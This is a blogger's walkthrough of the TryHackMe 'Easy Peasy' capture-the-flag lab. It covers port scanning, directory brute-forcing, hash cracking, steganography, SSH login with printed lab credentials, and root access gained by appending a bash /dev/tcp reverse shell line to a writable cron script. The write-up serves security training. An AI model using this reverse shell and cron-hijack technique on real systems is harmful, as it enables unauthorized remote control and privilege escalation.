Challenges: Easy Peasy (TryHackMe)

Jebitok

In this task, we explore the fundamentals of enumeration, exploitation, and privilege escalation on a vulnerable machine. By leveraging tools like Nmap, Gobuster, cURL, John the Ripper, and Steghide, we methodically uncover hidden directories, decode encoded messages, crack hashes, and eventually gain both user and root access via SSH and a reverse shell. Each step reflects real-world techniques often used during Capture The Flag (CTF) challenges and penetration tests, helping reinforce offensive security concepts in practice.

We begin by scanning the machine to identify open ports and services, then enumerate directories to discover hidden content. From there, we crack encoded data and hashes to retrieve credentials, gain a shell on the target system, and escalate privileges to obtain both the user and root flags.

Enumeration through Nmap

Deploy the machine attached to this task and use nmap to enumerate it.


nmap -p- -sC -sV IP_Address

Answer the questions below

  1. How many ports are open?

  2. What is the version of nginx?

  3. What is running on the highest port? Apache
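The three questions above can be answered from the scan file rather than by reading the scan by eye. The script below is an added example and is not part of the original writeup: it parses nmap's greppable output (-oG) with grep, sed and awk. The scan text it runs on is a constructed sample; the ports 80, 6498 and 65524 match the writeup, but the version strings are made up and are not the answers to the questions.

```shell
#!/bin/sh
# Added example, not from the original writeup: answer the three enumeration
# questions mechanically from nmap's greppable output. Generate the real file with:
#   nmap -p- -sC -sV -oG scan.gnmap MACHINE_IP
# The scan below is a CONSTRUCTED sample: ports 80, 6498 and 65524 match the
# writeup, but the version strings are made up and are not the answers.

SAMPLE_GNMAP='# Nmap 7.94 scan initiated (constructed sample)
Host: 10.10.10.10 ()  Status: Up
Host: 10.10.10.10 ()  Ports: 22/closed/tcp//ssh///, 80/open/tcp//http//nginx 1.2.3/, 6498/open/tcp//ssh//OpenSSH 7.0/, 65524/open/tcp//http//Apache httpd 2.4.0 ((Ubuntu))/  Ignored State: closed (65531)
# Nmap done'

# Read greppable output on stdin and print one "port<TAB>proto<TAB>service<TAB>version"
# line per OPEN port. Greppable port entries look like
#   port/state/proto/owner/service/rpcinfo/version/
# so with awk -F/ the fields of interest are 1, 2, 3, 5 and 7.
open_ports() {
    grep 'Ports:' |
    sed 's/.*Ports: //; s/[[:space:]]*Ignored State.*//' |
    tr ',' '\n' |
    sed 's/^[[:space:]]*//' |
    awk -F/ 'BEGIN { OFS = "\t" } $2 == "open" { print $1, $3, $5, $7 }'
}

# Q1: how many ports are open? (closed/filtered entries are dropped by open_ports)
count_open() { open_ports | wc -l | tr -d ' '; }

# Q2: version of a product, e.g. `version_of nginx`. Matches the start of the
# version column, so nginx is found even though two ports both run "http".
version_of() {
    open_ports | awk -F'\t' -v p="$1" 'index($4, p) == 1 { print $4; exit }'
}

# Q3: what runs on the highest open port? Numeric sort on the port column.
highest_port_product() { open_ports | sort -n | tail -n 1 | cut -f4; }

printf '%s\n' "$SAMPLE_GNMAP" | count_open
printf '%s\n' "$SAMPLE_GNMAP" | version_of nginx
printf '%s\n' "$SAMPLE_GNMAP" | highest_port_product
```

Point the same functions at a real scan with `count_open < scan.gnmap`; the `$2 == "open"` filter matters because `-sV` scans list closed or filtered ports in the same `Ports:` field.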

Compromising the machine

Now you've enumerated the machine, answer questions and compromise it!

Answer the questions below

  1. Using GoBuster, find flag 1.

    gobuster dir -u http://IP_Address -w /usr/share/wordlists/dirb/common.txt

    gobuster dir -u http://IP_Address/hidden/whatever/ -w /usr/share/wordlists/dirb/common.txt

    curl http://IP_Address/hidden/whatever/index.html

    The content returned is a base64-encoded string; decoding it (base64decode.org, or base64 -d on the command line) gives flag 1.

  2. Further enumerate the machine, what is flag 2?

    Checking robots.txt on the port 65524 site reveals this:

    curl http://IP_Address:65524/robots.txt

    The file allows only a bot with the User-Agent a18672860d0510e5ab6699730763b250 to crawl the site. A 32-character hex string has the length of an MD5 hash (ChatGPT's reading: likely a key, a hash or a token), so look it up on Hashes.com:

  3. Crack the hash with easypeasy.txt, What is the flag 3?

    curl http://IP_Address:65524/index.html reveals the flag

  4. What is the hidden directory?

    The site gives this hint:

  5. Using the wordlist provided to you in this task, crack the hash.
    What is the password?

    Browse to the hidden directory http://IP_Address:65524/n0th1ng3ls3m4tt3r/ and inspect the page source; the same hash also appears when you hover over the page or the image.

    copy the hash into a file:

    echo "940d71e8655ac41efb5f8ab850668505b86dd64186a66e57d1483e7f5fe6fd81" >> hash.txt

    Use the provided easypeasy.txt as the wordlist. The hash is 64 hex characters, which fits several algorithms (SHA-256, SHA3-256, GOST and others), so tell john explicitly that it is GOST R 34.11-94:

    john --wordlist=easypeasy.txt --format=gost hash.txt

  6. What is the password to login to the machine via SSH?

    There is an image (binarycodepixabay.jpg) in the hidden directory; copy its URL and download it locally:

    wget http://IP_Address:65524/n0th1ng3ls3m4tt3r/binarycodepixabay.jpg

    Use steghide to extract the file hidden in the image (steghide prompts for a passphrase):

    steghide extract -sf binarycodepixabay.jpg

    cat file_name.txt

    The file contains a string of binary digits; decode it with CyberChef's From Binary recipe:

  7. What is the user flag?

    The decoded file gives the username, boring, and the password. SSH in on port 6498 for the initial low-privileged access:

    ssh -p 6498 boring@IP_Address

    password: iconvertedmypasswordtobinary

    The user flag is ROT13-encoded, so decode it with CyberChef's ROT13 recipe. I forgot to capture the user flag, but this is the final

  8. What is the root flag?

    Locate the flag file by name (-name; -perm expects a permission mode, not a filename):

    find / -name user.txt 2> /dev/null

    echo "bash -i >& /dev/tcp/YOUR_IP/4444 0>&1" >> /var/www/.mysecretcronjob.sh

On AttackBox run the listener:

nc -lvnp 4444

On the target machine, run the script once to check that the payload works (this only returns a shell as boring):

bash /var/www/.mysecretcronjob.sh

The root shell comes when the cron job that executes /var/www/.mysecretcronjob.sh fires, so check /etc/crontab for the entry and the user it runs as, and keep the listener open until the job runs.
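The escalation above relies on a cron job that runs a script boring can write to. As an added example (not from the original writeup), the script below reads a system-format crontab, the layout of /etc/crontab and /etc/cron.d files with a user field, and reports every absolute path on a command line that the current user can modify. It runs against a constructed crontab in a temporary directory, so the script names and the /bin/true entry are assumptions for the demo, not the real box's crontab.

```shell
#!/bin/sh
# Added example, not from the original writeup: find the privilege-escalation
# pattern "a privileged cron job runs a script the low-privileged user can
# write to". Reads a system-format crontab (m h dom mon dow user command) and
# reports every absolute path in a command that exists and is writable by us.
# The crontab below is CONSTRUCTED in a temp dir; on a target, run it against
# /etc/crontab and each file in /etc/cron.d.

# usage: writable_cron_targets /etc/crontab
# prints: user<TAB>writable_path<TAB>full command
writable_cron_targets() {
    file=$1
    while IFS= read -r line; do
        case "$line" in
            ''|'#'*) continue ;;            # blank lines and comments
            [A-Za-z_]*=*) continue ;;      # SHELL=, PATH=, MAILTO= ...
        esac
        set -f                              # keep the "*" schedule fields literal
        set -- $line
        set +f
        case "$1" in
            @*) [ $# -ge 3 ] || continue; user=$2; shift 2 ;;   # @reboot user command
            *)  [ $# -ge 7 ] || continue; user=$6; shift 6 ;;   # m h dom mon dow user command
        esac
        for tok in "$@"; do
            case "$tok" in
                /*) if [ -f "$tok" ] && [ -w "$tok" ]; then
                        printf '%s\t%s\t%s\n' "$user" "$tok" "$*"
                    fi ;;
            esac
        done
    done < "$file"
}

# Constructed demo: one cron script we can write to (as boring could on the
# box), one we cannot, and a system binary.
DEMO_DIR=$(mktemp -d)
printf '#!/bin/sh\n' > "$DEMO_DIR/.mysecretcronjob.sh"
chmod 777 "$DEMO_DIR/.mysecretcronjob.sh"
printf '#!/bin/sh\n' > "$DEMO_DIR/locked.sh"
chmod 555 "$DEMO_DIR/locked.sh"
cat > "$DEMO_DIR/crontab" <<EOF
# constructed /etc/crontab (demo only)
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
* * * * * root bash $DEMO_DIR/.mysecretcronjob.sh
0 3 * * * root $DEMO_DIR/locked.sh --quiet
@reboot root /bin/true
EOF

writable_cron_targets "$DEMO_DIR/crontab"
```

The check uses `test -w`, so run it as the low-privileged user you actually have (as root everything is writable and the output is meaningless). A writable script is the direct case; a script you cannot write but whose parent directory you can is the same bug, so check the directory permissions by hand as well.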
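Steps 1, 6 and 7 above and the two hash lookups all went through web tools (base64decode, Hashes.com, CyberChef). The script below is an added example, not from the original writeup, with command-line equivalents: base64, binary-to-ASCII and ROT13 decoders, plus a length-based hash triage that lists what a 32- or 64-character hex string can be before you choose a john --format. The inputs in the demo calls are constructed: the base64 string decodes to a placeholder flag and the binary string encodes the username boring, not the real file content; the two hashes are the ones quoted earlier in the writeup.

```shell
#!/bin/sh
# Added example, not from the original writeup: command-line versions of the
# decoding steps done above with base64decode.org and CyberChef, plus a hash
# length check. Demo inputs are CONSTRUCTED: the binary string below encodes
# the username "boring", not the content of the file steghide extracted.

# Flag 1: base64 (what base64decode.org / CyberChef "From Base64" did).
b64_decode() { printf '%s' "$1" | base64 -d; }

# Step 6: a string of 0/1 characters, with or without spaces, to ASCII.
# Everything that is not 0 or 1 is stripped, then each 8-bit group is converted.
bin_to_ascii() {
    printf '%s' "$1" | tr -cd '01' | awk '{
        for (i = 1; i + 7 <= length($0); i += 8) {
            v = 0
            for (j = 0; j < 8; j++) v = v * 2 + substr($0, i + j, 1)
            printf "%c", v
        }
    }'
}

# Step 7: ROT13 is its own inverse, so the same call encodes and decodes.
rot13() { printf '%s' "$1" | tr 'A-Za-z' 'N-ZA-Mn-za-m'; }

# Hash triage by length. Length never identifies the algorithm on its own: a
# 64-hex string may be SHA-256, SHA3-256, BLAKE2s or GOST R 34.11-94, which is
# why the john run above needed an explicit --format=gost.
hash_len_hint() {
    h=$1
    [ -z "$(printf '%s' "$h" | tr -d '0-9a-fA-F')" ] || { echo "not a hex string"; return 1; }
    case ${#h} in
        32)  echo "32 hex: MD5, NTLM, MD4 (try md5 first)" ;;
        40)  echo "40 hex: SHA-1, RIPEMD-160" ;;
        64)  echo "64 hex: SHA-256, SHA3-256, BLAKE2s-256, GOST R 34.11-94 (john --format=gost)" ;;
        128) echo "128 hex: SHA-512, SHA3-512, BLAKE2b-512" ;;
        *)   echo "${#h} hex: no common raw hash has this length" ;;
    esac
}

b64_decode 'ZmxhZ3t0ZXN0fQ=='; echo
bin_to_ascii '01100010 01101111 01110010 01101001 01101110 01100111'; echo
rot13 'uryyb'; echo
hash_len_hint a18672860d0510e5ab6699730763b250
hash_len_hint 940d71e8655ac41efb5f8ab850668505b86dd64186a66e57d1483e7f5fe6fd81
```

Each helper takes the string as its first argument, so the extracted file from the steghide step is decoded with `bin_to_ascii "$(cat file_name.txt)"`, and a ROT13 flag read over SSH with `rot13 "$(cat user.txt)"`.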

This challenge demonstrated the complete attack lifecycle—from initial enumeration to root-level access. Key takeaways include:

  • Thorough port scanning with Nmap (-p- -sC -sV) helped reveal services running on standard and non-standard ports.

  • Directory brute-forcing with Gobuster uncovered hidden paths critical to progressing.

  • Using tools like CyberChef, John the Ripper, and Steghide was essential for decoding and uncovering hidden credentials or files.

  • Analyzing web content like robots.txt or base64 strings helped uncover information often overlooked.

  • Finally, combining SSH access and a crafted reverse shell enabled full system compromise and flag retrieval.

This task reinforces the importance of persistence, enumeration, and toolchain proficiency in real-world penetration testing and CTFs.


Written by

Jebitok

Software Developer | Learning Cybersecurity | Open for roles * If you're in the early stages of your career in software development (student or still looking for an entry-level role) and in need of mentorship, you can reach out to me.